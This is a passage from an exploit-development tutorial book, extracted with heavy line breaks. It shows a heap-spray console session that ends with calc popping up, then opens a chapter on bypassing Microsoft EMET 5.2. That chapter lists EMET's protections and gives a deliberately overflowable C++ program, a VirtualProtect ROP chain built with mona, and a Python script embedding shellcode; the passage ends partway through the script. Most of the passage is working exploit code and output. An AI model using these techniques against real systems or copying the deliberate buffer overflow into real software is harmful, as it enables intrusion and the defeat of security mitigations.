3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 4
 
 
1) Multiplier (multiplier = 2)
 
2) LowerCaser
 
3) Exit
 
 
Your choice [1
-
3]: 1
 
 
mutators[0] = 0x003dc488        <====================
 
multiplier (int): asdf
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Blo
ck
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 224 
-
 
Your choice [1
-
6]: 3
 
 
-------
 Blocks 
-------
 
block 0: address = 0x003dc538; size = 168
 
----------------------
 
 
Index of block to duplicate (
-
1 to exit): 0
 
Number of copies (
-
1 to exit): 1
 
1) Read block from 
file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 2
 
 
-------
 Blocks 
-------
 
block 0: address = 0x003dc538; size = 168
 
block 1: address = 0x003dc488; size = 168       <====================
 
--------------
--------
 
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 1
 
 
File path ('exit' to exit): d:
\
buf.dat
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 225 
-
 
 
Block read (1048528 bytes)     <==================== 1 MB
 
 
1) Read block from fi
le
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 3
 
 
-------
 Blocks 
-------
 
block 0: address = 0x003dc538; size = 168
 
block 1: address = 0x003dc488; size = 168
 
block 2: address = 0x00c60020; size = 104852
8
 
----------------------
 
 
Index of block to duplicate (
-
1 to exit): 2
 
Number of copies (
-
1 to exit): 200     <==================== 200 x 1 MB = 200 MB
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Y
our choice [1
-
6]: 5
 
 
-------
 Blocks 
-------
 
block 0: address = 0x003dc538; size = 168
 
block 1: address = 0x003dc488; size = 168
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 226 
-
 
block 2: address = 0x00c60020; size = 1048528
 
block 3: address = 0x00e60020; size = 1048528
 
block 4: address = 0x00f60020; size 
= 1048528
 
block 5: address = 0x02480020; size = 1048528
 
block 6: address = 0x02580020; size = 1048528
 
block 7: address = 0x02680020; size = 1048528
 
block 8: address = 0x02780020; size = 1048528
 
block 9: address = 0x02880020; size = 1048528
 
block 10: addres
s = 0x02980020; size = 1048528
 
block 11: address = 0x02a80020; size = 1048528
 
block 12: address = 0x02b80020; size = 1048528
 
block 13: address = 0x02c80020; size = 1048528
 
block 14: address = 0x02d80020; size = 1048528
 
block 15: address = 0x02e80020; size 
= 1048528
 
block 16: address = 0x02f80020; size = 1048528
 
block 17: address = 0x03080020; size = 1048528
 
block 18: address = 0x03180020; size = 1048528
 
block 19: address = 0x03280020; size = 1048528
 
block 20: address = 0x03380020; size = 1048528
 
block 21: a
ddress = 0x03480020; size = 1048528
 
block 22: address = 0x03580020; size = 1048528
 
block 23: address = 0x03680020; size = 1048528
 
block 24: address = 0x03780020; size = 1048528
 
block 25: address = 0x03880020; size = 1048528
 
block 26: address = 0x03980020; 
size = 1048528
 
block 27: address = 0x03a80020; size = 1048528
 
block 28: address = 0x03b80020; size = 1048528
 
block 29: address = 0x03c80020; size = 1048528
 
block 30: address = 0x03d80020; size = 1048528
 
block 31: address = 0x03e80020; size = 1048528
 
block 
32: address = 0x03f80020; size = 1048528
 
block 33: address = 0x04080020; size = 1048528
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 227 
-
 
block 34: address = 0x04180020; size = 1048528
 
block 35: address = 0x04280020; size = 1048528
 
block 36: address = 0x04380020; size = 1048528
 
block 37: address = 0x04480
020; size = 1048528
 
block 38: address = 0x04580020; size = 1048528
 
block 39: address = 0x04680020; size = 1048528
 
block 40: address = 0x04780020; size = 1048528
 
block 41: address = 0x04880020; size = 1048528
 
block 42: address = 0x04980020; size = 1048528
 
b
lock 43: address = 0x04a80020; size = 1048528
 
block 44: address = 0x04b80020; size = 1048528
 
block 45: address = 0x04c80020; size = 1048528
 
block 46: address = 0x04d80020; size = 1048528
 
block 47: address = 0x04e80020; size = 1048528
 
block 48: address = 0x
04f80020; size = 1048528
 
block 49: address = 0x05080020; size = 1048528
 
block 50: address = 0x05180020; size = 1048528
 
block 51: address = 0x05280020; size = 1048528
 
block 52: address = 0x05380020; size = 1048528
 
block 53: address = 0x05480020; size = 1048
528
 
block 54: address = 0x05580020; size = 1048528
 
block 55: address = 0x05680020; size = 1048528
 
block 56: address = 0x05780020; size = 1048528
 
block 57: address = 0x05880020; size = 1048528
 
block 58: address = 0x05980020; size = 1048528
 
block 59: address
 = 0x05a80020; size = 1048528
 
block 60: address = 0x05b80020; size = 1048528
 
block 61: address = 0x05c80020; size = 1048528
 
block 62: address = 0x05d80020; size = 1048528
 
block 63: address = 0x05e80020; size = 1048528
 
block 64: address = 0x05f80020; size =
 1048528
 
block 65: address = 0x06080020; size = 1048528
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 228 
-
 
block 66: address = 0x06180020; size = 1048528
 
block 67: address = 0x06280020; size = 1048528
 
block 68: address = 0x06380020; size = 1048528
 
block 69: address = 0x06480020; size = 1048528
 
block 70: ad
dress = 0x06580020; size = 1048528
 
block 71: address = 0x06680020; size = 1048528
 
block 72: address = 0x06780020; size = 1048528
 
block 73: address = 0x06880020; size = 1048528
 
block 74: address = 0x06980020; size = 1048528
 
block 75: address = 0x06a80020; s
ize = 1048528
 
block 76: address = 0x06b80020; size = 1048528
 
block 77: address = 0x06c80020; size = 1048528
 
block 78: address = 0x06d80020; size = 1048528
 
block 79: address = 0x06e80020; size = 1048528
 
block 80: address = 0x06f80020; size = 1048528
 
block 8
1: address = 0x07080020; size = 1048528
 
block 82: address = 0x07180020; size = 1048528
 
block 83: address = 0x07280020; size = 1048528
 
block 84: address = 0x07380020; size = 1048528
 
block 85: address = 0x07480020; size = 1048528
 
block 86: address = 0x075800
20; size = 1048528
 
block 87: address = 0x07680020; size = 1048528
 
block 88: address = 0x07780020; size = 1048528
 
block 89: address = 0x07880020; size = 1048528
 
block 90: address = 0x07980020; size = 1048528
 
block 91: address = 0x07a80020; size = 1048528
 
bl
ock 92: address = 0x07b80020; size = 1048528
 
block 93: address = 0x07c80020; size = 1048528
 
block 94: address = 0x07d80020; size = 1048528
 
block 95: address = 0x07e80020; size = 1048528
 
block 96: address = 0x07f80020; size = 1048528
 
block 97: address = 0x0
8080020; size = 1048528
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 229 
-
 
block 98: address = 0x08180020; size = 1048528
 
block 99: address = 0x08280020; size = 1048528
 
block 100: address = 0x08380020; size = 1048528
 
block 101: address = 0x08480020; size = 1048528
 
block 102: address = 0x08580020; size = 10
48528
 
block 103: address = 0x08680020; size = 1048528
 
block 104: address = 0x08780020; size = 1048528
 
block 105: address = 0x08880020; size = 1048528
 
block 106: address = 0x08980020; size = 1048528
 
block 107: address = 0x08a80020; size = 1048528
 
block 108:
 address = 0x08b80020; size = 1048528
 
block 109: address = 0x08c80020; size = 1048528
 
block 110: address = 0x08d80020; size = 1048528
 
block 111: address = 0x08e80020; size = 1048528
 
block 112: address = 0x08f80020; size = 1048528
 
block 113: address = 0x090
80020; size = 1048528
 
block 114: address = 0x09180020; size = 1048528
 
block 115: address = 0x09280020; size = 1048528
 
block 116: address = 0x09380020; size = 1048528
 
block 117: address = 0x09480020; size = 1048528
 
block 118: address = 0x09580020; size = 10
48528
 
block 119: address = 0x09680020; size = 1048528
 
block 120: address = 0x09780020; size = 1048528
 
block 121: address = 0x09880020; size = 1048528
 
block 122: address = 0x09980020; size = 1048528
 
block 123: address = 0x09a80020; size = 1048528
 
block 124:
 address = 0x09b80020; size = 1048528
 
block 125: address = 0x09c80020; size = 1048528
 
block 126: address = 0x09d80020; size = 1048528
 
block 127: address = 0x09e80020; size = 1048528
 
block 128: address = 0x09f80020; size = 1048528
 
block 129: address = 0x0a0
80020; size = 1048528
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 230 
-
 
block 130: address = 0x0a180020; size = 1048528
 
block 131: address = 0x0a280020; size = 1048528
 
block 132: address = 0x0a380020; size = 1048528
 
block 133: address = 0x0a480020; size = 1048528
 
block 134: address = 0x0a580020; size = 10
48528
 
block 135: address = 0x0a680020; size = 1048528
 
block 136: address = 0x0a780020; size = 1048528
 
block 137: address = 0x0a880020; size = 1048528
 
block 138: address = 0x0a980020; size = 1048528
 
block 139: address = 0x0aa80020; size = 1048528
 
block 140:
 address = 0x0ab80020; size = 1048528
 
block 141: address = 0x0ac80020; size = 1048528
 
block 142: address = 0x0ad80020; size = 1048528
 
block 143: address = 0x0ae80020; size = 1048528
 
block 144: address = 0x0af80020; size = 1048528
 
block 145: address = 0x0b0
80020; size = 1048528
 
block 146: address = 0x0b180020; size = 1048528
 
block 147: address = 0x0b280020; size = 1048528
 
block 148: address = 0x0b380020; size = 1048528
 
block 149: address = 0x0b480020; size = 1048528
 
block 150: address = 0x0b580020; size = 10
48528
 
block 151: address = 0x0b680020; size = 1048528
 
block 152: address = 0x0b780020; size = 1048528
 
block 153: address = 0x0b880020; size = 1048528
 
block 154: address = 0x0b980020; size = 1048528
 
block 155: address = 0x0ba80020; size = 1048528
 
block 156:
 address = 0x0bb80020; size = 1048528
 
block 157: address = 0x0bc80020; size = 1048528
 
block 158: address = 0x0bd80020; size = 1048528
 
block 159: address = 0x0be80020; size = 1048528
 
block 160: address = 0x0bf80020; size = 1048528
 
block 161: address = 0x0c0
80020; size = 1048528
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 231 
-
 
block 162: address = 0x0c180020; size = 1048528
 
block 163: address = 0x0c280020; size = 1048528
 
block 164: address = 0x0c380020; size = 1048528
 
block 165: address = 0x0c480020; size = 1048528
 
block 166: address = 0x0c580020; size = 10
48528
 
block 167: address = 0x0c680020; size = 1048528
 
block 168: address = 0x0c780020; size = 1048528
 
block 169: address = 0x0c880020; size = 1048528
 
block 170: address = 0x0c980020; size = 1048528
 
block 171: address = 0x0ca80020; size = 1048528
 
block 172:
 address = 0x0cb80020; size = 1048528
 
block 173: address = 0x0cc80020; size = 1048528
 
block 174: address = 0x0cd80020; size = 1048528
 
block 175: address = 0x0ce80020; size = 1048528
 
block 176: address = 0x0cf80020; size = 1048528
 
block 177: address = 0x0d0
80020; size = 1048528
 
block 178: address = 0x0d180020; size = 1048528
 
block 179: address = 0x0d280020; size = 1048528
 
block 180: address = 0x0d380020; size = 1048528
 
block 181: address = 0x0d480020; size = 1048528
 
block 182: address = 0x0d580020; size = 10
48528
 
block 183: address = 0x0d680020; size = 1048528
 
block 184: address = 0x0d780020; size = 1048528
 
block 185: address = 0x0d880020; size = 1048528
 
block 186: address = 0x0d980020; size = 1048528
 
block 187: address = 0x0da80020; size = 1048528
 
block 188:
 address = 0x0db80020; size = 1048528
 
block 189: address = 0x0dc80020; size = 1048528
 
block 190: address = 0x0dd80020; size = 1048528
 
block 191: address = 0x0de80020; size = 1048528
 
block 192: address = 0x0df80020; size = 1048528
 
block 193: address = 0x0e0
80020; size = 1048528
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 232 
-
 
block 194: address = 0x0e180020; size = 1048528
 
block 195: address = 0x0e280020; size = 1048528
 
block 196: address = 0x0e380020; size = 1048528
 
block 197: address = 0x0e480020; size = 1048528
 
block 198: address = 0x0e580020; size = 10
48528
 
block 199: address = 0x0e680020; size = 1048528
 
block 200: address = 0x0e780020; size = 1048528
 
block 201: address = 0x0e880020; size = 1048528
 
block 202: address = 0x0e980020; size = 1048528
 
----------------------
 
 
Index of block to mutate (
-
1 to ex
it): 0
 
1) Multiplier
 
2) LowerCaser
 
3) Exit
 
Your choice [1
-
3]: 1
 
As soon as we complete this sequence, the calculator pops up!
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 233 
-
 
EMET 5.2
 
 
The acronym 
EMET
 stands for 
E
nhanced 
M
itigation 
E
xperience 
T
oolkit. As of this writing, the latest version 
of EMET is 5.2 (
download
).
 
As always, we’ll
 be working on 
Windows 7 SP1 64
-
bit
.
 
Warning
 
EMET 5.2 may conflict with some 
Firewall
 and 
AntiVirus
 software. For instance, I spent hours wondering 
why EMET would detect exploitation attempts even where there were none. Eventually, I found out that it 
was 
a conflict with 
Comodo Firewall
. I had to uninstall it completely.
 
Good Firewalls are not common so I left Comodo Firewall alone and decided to work in a 
Virtual Machine
 (I 
use 
VirtualBox
).
 
Protections
 
As the name suggests, EMET tries to mitigate the effec
ts of exploits. It does this by introducing the following 
protections:
 
1
.
 
Data Execution Prevention
 (
DEP
)
 
It stops the execution of instructions if they are located in areas of memory marked as 
no execute
.
 
2
.
 
Structured Exception Handler Overwrite Protection
 (
SE
HOP
)
 
It prevents exploitation techniques that aim at overwriting Windows 
Structured Exception Handler
.
 
3
.
 
Null Page Protection
 (
NullPage
)
 
It pre
-
allocates the null page to prevent exploits from using it with malicious purpose.
 
4
.
 
Heap Spray Protection
 (
HeapSpray
)
 
It pre
-
allocates areas of memory the are commonly used by attackers to allocate malicious code.
 
(For instance, 0x0a040a04; 0x0a0a0a0a; 0x0b0b0b0b; 0x0c0c0c0c; 0x0d0d0d0d; 0x0e0e0e0e; 
0x04040404; 0x05050505; 0x06060606; 0x07070707; 0x08080808; 0x09090909;
 0x20202020; 
0x14141414)
 
5
.
 
Export Address Table Access Filtering
 (
EAF
)
 
It regulates access to the 
E
xport 
A
ddress 
T
able (
EAT
) based on the calling code.
 
6
.
 
Export Address Table Access Filtering Plus
 (
EAF+
)
 
It blocks read attempts to export and import table addre
sses originating from modules commonly used to 
probe memory during the exploitation of memory corruption vulnerabilities.
 
7
.
 
Mandatory Address Space Layout Randomization
 (
MandatoryASLR
)
 
It randomizes the location where modules are loaded in memory, limiting t
he ability of an attacker to point 
to pre
-
determined memory addresses.
 
8
.
 
Bottom
-
Up Address Space Layout Randomization
 (
BottomUpASLR
)
 
It improves the MandatoryASLR mitigation by randomizing the base address of bottom
-
up allocations.
 
9
.
 
Load Library Protection
 (
L
oadLib
)
 
It stops the loading of modules located in 
UNC paths
 (e.g. 
\
\
evilsite
\
bad.dll
), common technique in 
R
eturn 
O
riented 
P
rogramming (
ROP
) attacks.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 234 
-
 
10
.
 
Memory Protection
 (
MemProt
)
 
It disallows marking 
execute
 memory areas on the stack, common technique in R
eturn Oriented 
Programming (ROP) attacks.
 
11
.
 
ROP Caller Check
 (
Caller
)
 
It stops the execution of critical functions if they are reached via a 
RET
 instruction, common technique in 
Return Oriented Programming (ROP) attacks.
 
12
.
 
ROP Simulate Execution Flow
 (
SimExecF
low
)
 
It reproduces the execution flow after the return address, trying to detect Return Oriented Programming 
(ROP) attacks.
 
13
.
 
Stack Pivot
 (
StackPivot
)
 
It checks if the stack pointer is changed to point to attacker
-
controlled memory areas, common technique 
in
 Return Oriented Programming (ROP) attacks.
 
14
.
 
Attack Surface Reduction
 (
ASR
)
 
It prevents defined modules from being loaded in the address space of the protected process.
 
This sounds pretty intimidating, doesn’t it? But let’s not give up before we even start!
 
The program
 
To analyze EMET with ease is better to use one of our little 
C/C++
 applications. We’re going to reuse 
exploitme3.cpp
 (
article
) but with some modifications:
 
C++
 
 
#include <cstdio>
 
 
_declspec
(
noinlin
e
)
 
int
 
f
()
 
{
 
    
char
 
name
[
32
];
 
    
printf
(
"Reading name from file...
\
n"
);
 
 
FILE
 
*
f
 
=
 
fopen
(
"c:
\
\
deleteme
\
\
name.dat"
,
 
"rb"
);
 
    
if
 
(!
f
)
 
        
return
 
-
1
;
 
    
fseek
(
f
,
 
0L
,
 
SEEK_END
);
 
    
long
 
bytes
 
=
 
ftell
(
f
);
 
    
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
    
fread
(
na
me
,
 
1
,
 
bytes
,
 
f
);
 
    
name
[
bytes
]
 
=
 
'
\
0'
;
 
    
fclose
(
f
);
 
 
printf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
return
 
0
;
 
}
 
 
int
 
main
()
 
{
 
    
char
 
moreStack
[
10000
];
 
    
for
 
(
int
 
i
 
=
 
0
;
 
i
 
<
 
sizeof
(
moreStack
);
 
++
i
)
 
        
moreStack
[
i
]
 
=
 
i
;
 
 
return
 
f
();
 
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 235 
-
 
 
The stack var
iable 
moreStack
 gives us more space on the stack. Remember that the stack grows towards 
low addresses
 whereas 
fread
 writes going towards 
high addresses
. Without this additional space on the 
stack, 
fread
 might reach the end of the stack and crash the progra
m.
 
The
 for loop
 in 
main
 is needed otherwise 
moreStack
 is optimized away. Also, if function 
f
 is 
inlined
, the 
buffer 
name
 is allocated after 
moreStack
 (i.e. towards the end of the stack) which defeats the purpose. To 
avoid this, we need to use 
_declspec(noi
nline)
.
 
As we did before, we’ll need to disable 
stack cookies
, but leave DEP on, by going to 
Project
→
properties
, 
and modifying the configuration for 
Release
 as follows:
 

 
Configuration Properties
 
o
 
C/C++
 

 
Code Generation
 

 
Security Check
: Disable Security Check (
/GS
-
)
 
Make sure that DEP is activated:
 

 
Configuration Properties
 
o
 
Linker
 

 
Advanced
 

 
Data Execution Prevention (DEP)
: Yes (/NXCOMPAT)
 
ASLR considerations
 
We know that to beat ASLR we need some kind of 
info leak
 and in the next two chapters we’ll develop 
exploit
s for 
Internet Explorer 10
 and 
11
 with ASLR enabled. But for now, let’s ignore ASLR and concentrate 
on DEP and ROP.
 
Our program 
exploitme3
 uses the library 
msvcr120.dll
. Unfortunately, every time the program is run, the 
library is loaded at a different add
ress. We could build our ROP chain from system libraries (
kernel32.dll
, 
ntdll.dll
, etc...), but that wouldn’t make much sense. We went to great lengths to build a reliable shellcode 
which gets the addresses of the 
API functions
 we want to call by looking the
m up in the Export Address 
Tables. If we were to hardcode the addresses of the 
gadgets
 taken from 
kernel32.dll
 and 
ntdll.dll
 then it’d 
make sense to hardcode the addresses of the API functions as well.
 
So, the right thing to do is to take our gadgets from 
msvcr120.dll
. Unfortunately, while the base addresses of 
kernel32.dll
 and 
ntdll.dll
 change only when Windows is rebooted, as we’ve already said, the base address of 
msvcr120.dll
 changes whenever 
exploitme3
 is run.
 
The difference between these two behaviors
 stems from the fact that 
kernel32.dll
 and 
ntdll.dll
 are already 
loaded in memory when 
exploitme3
 is executed, whereas 
msvcr120.dll
 is not. Therefore, one solution is to 
run the following program:
 
C++
 
 
#include <Windows.h>
 
#include <stdio.h>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 236 
-
 
#include <coni
o.h>
 
 
int
 
main
()
 
{
 
    
printf
(
"msvcr120 = %p
\
n"
,
 
GetModuleHandle
(
L"msvcr120"
));
 
    
printf
(
"
---
 press any key 
---
\
n"
);
 
    
_getch
();
 
    
return
 
0
;
 
}
 
 
As long as we don’t terminate this program, the base address of 
msvcr120.dll
 won’t change. When we run 
ex
ploitme3
, Windows will see that 
msvcr120.dll
 is already loaded in memory so it’ll simply map it in the 
address space of 
exploitme3
. Moreover, 
msvcr120.dll
 will be mapped at the same address because it 
contains 
position
-
dependent code
 which wouldn’t work if
 placed at a different position.
 
Initial Exploit
 
Open EMET and click on the button 
Apps
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 237 
-
 
Now click on 
Add Application
 and choose 
e
xploitme3.exe
:
 
 
You should see that 
exploitme3
 has been added to the list:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 238 
-
 
 
Let’s start by disabling EAF, LoadLib, MemProt, Caller, SimExecFlow and StackPivot:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 239 
-
 
 
Press 
OK
 to confirm the settings.
 
Now let’s load 
exploitme3.exe
 in 
WinDbg
 (
article
) and use 
mona
 (
article
) to generate a 
rop ch
ain
 for 
VirtualProtect
:
 
.load pykd.pyd
 
!py mona rop 
-
m msvcr120
 
Here’s the ROP chain found in the file 
rop_chains.txt
 created by mona:
 
Python
 
 
def
 
create_rop_chain
():
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 240 
-
 
  
# rop chain generated with mona.py 
-
 www.corelan.be
 
  
rop_gadgets
 
=
 
[
 
    
0x7053fc6f
,
  
# POP EBP # RETN [MSVCR120.dll]
 
    
0x7053fc6f
,
  
# skip 4 bytes [MSVCR120.dll]
 
    
0x704f00f6
,
  
# POP EBX # RETN [MSVCR120.dll]
 
    
0x00000201
,
  
# 0x00000201
-
> ebx
 
    
0x704b6580
,
  
# POP EDX # RETN [MSVCR120.dll]
 
    
0x00000040
,
  
# 0x00000040
-
> edx
 
    
0
x7049f8cb
,
  
# POP ECX # RETN [MSVCR120.dll]
 
    
0x705658f2
,
  
# &Writable location [MSVCR120.dll]
 
    
0x7048f95c
,
  
# POP EDI # RETN [MSVCR120.dll]
 
    
0x7048f607
,
  
# RETN (ROP NOP) [MSVCR120.dll]
 
    
0x704eb436
,
  
# POP ESI # RETN [MSVCR120.dll]
 
    
0x70493a
17
,
  
# JMP [EAX] [MSVCR120.dll]
 
    
0x7053b8fb
,
  
# POP EAX # RETN [MSVCR120.dll]
 
    
0x705651a4
,
  
# ptr to &VirtualProtect() [IAT MSVCR120.dll]
 
    
0x7053b7f9
,
  
# PUSHAD # RETN [MSVCR120.dll]
 
    
0x704b7e5d
,
  
# ptr to 'call esp' [MSVCR120.dll]
 
  
]
 
  
return
 
''
.
join
(
struct
.
pack
(
'<I'
,
 
_
)
 
for
 
_
 
in
 
rop_gadgets
)
 
 
We’ve already seen how this chain works in the chapter 
Exploitme3 (DEP)
, so we won’t repeat ourselves. 
We’ll also take the script to generate the file 
name.da
t
 from the same chapter and modify it as needed. This 
is the initial version:
 
Python
 
 
import
 
struct
 
 
# The signature of VirtualProtect is the following:
 
#   BOOL WINAPI VirtualProtect(
 
#     _In_   LPVOID lpAddress,
 
#     _In_   SIZE_T dwSize,
 
#     _In_ 
  DWORD flNewProtect,
 
#     _Out_  PDWORD lpflOldProtect
 
#   );
 
 
# After PUSHAD is executed, the stack looks like this:
 
#   .
 
#   .
 
#   .
 
#   EDI (ptr to ROP NOP (RETN))
 
#   ESI (ptr to JMP [EAX] (EAX = address of ptr to VirtualProtect))
 
#   EBP (ptr to P
OP (skips EAX on the stack))
 
#   ESP (lpAddress (automatic))
 
#   EBX (dwSize)
 
#   EDX (NewProtect (0x40 = PAGE_EXECUTE_READWRITE))
 
#   ECX (lpOldProtect (ptr to writeable address))
 
#   EAX (address of ptr to VirtualProtect)
 
# lpAddress:
 
#   ptr to "call es
p"
 
#   <shellcode>
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 241 
-
 
msvcr120
 
=
 
0x73c60000
 
 
# Delta used to fix the addresses based on the new base address of msvcr120.dll.
 
md
 
=
 
msvcr120
 
-
 
0x70480000
 
 
def
 
create_rop_chain
(
code_size
):
 
    
rop_gadgets
 
=
 
[
 
      
md
 
+
 
0x7053fc6f
,
  
# POP EBP # RETN [MSVC
R120.dll]
 
      
md
 
+
 
0x7053fc6f
,
  
# skip 4 bytes [MSVCR120.dll]
 
      
md
 
+
 
0x704f00f6
,
  
# POP EBX # RETN [MSVCR120.dll]
 
      
code_size
,
        
# code_size 
-
> ebx
 
      
md
 
+
 
0x704b6580
,
  
# POP EDX # RETN [MSVCR120.dll]
 
      
0x00000040
,
       
# 0x00000040
-
> edx
 
      
md
 
+
 
0x7049f8cb
,
  
# POP ECX # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x705658f2
,
  
# &Writable location [MSVCR120.dll]
 
      
md
 
+
 
0x7048f95c
,
  
# POP EDI # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x7048f607
,
  
# RETN (ROP NOP) [MSVCR120.dll]
 
      
md
 
+
 
0x704eb436
,
  
# POP ESI # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x70493a17
,
  
# JMP [EAX] [MSVCR120.dll]
 
      
md
 
+
 
0x7053b8fb
,
  
# POP EAX # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x705651a4
,
  
# ptr to &VirtualProtect() [IAT MSVCR120.dll]
 
      
md
 
+
 
0x7053b7f9
,
  
# PUSHAD # RETN [MSVC
R120.dll]
 
      
md
 
+
 
0x704b7e5d
,
  
# ptr to 'call esp' [MSVCR120.dll]
 
    
]
 
    
return
 
''
.
join
(
struct
.
pack
(
'<I'
,
 
_
)
 
for
 
_
 
in
 
rop_gadgets
)
 
 
def
 
write_file
(
file_path
):
 
    
with
 
open
(
file_path
,
 
'wb'
)
 
as
 
f
:
 
        
ret_eip
 
=
 
md
 
+
 
0x7048f607
       
# RETN (ROP
 NOP) [MSVCR120.dll]
 
        
shellcode
 
=
 
(
 
            
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
 
+
 
            
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
 
+
 
            
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x
57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
 
+
 
            
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
 
+
 
            
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
 
+
 
            
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6
a
\
x02
\
xff
\
xd6"
 
+
 
            
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
 
+
 
            
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
 
+
 
            
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53
"
 
+
 
            
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
 
+
 
            
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
 
+
 
         
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
 
+
 
            
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
 
+
 
            
"
\
x89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
 
+
 
            
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
 
+
 
            
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
 
+
 
            
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x
0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
 
+
 
            
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
        
code_size
 
=
 
len
(
shellcode
)
 
        
name
 
=
 
'a'
*
36
 
+
 
struct
.
pack
(
'<I'
,
 
ret_eip
)
 
+
 
create_rop_chain
(
code_size
)
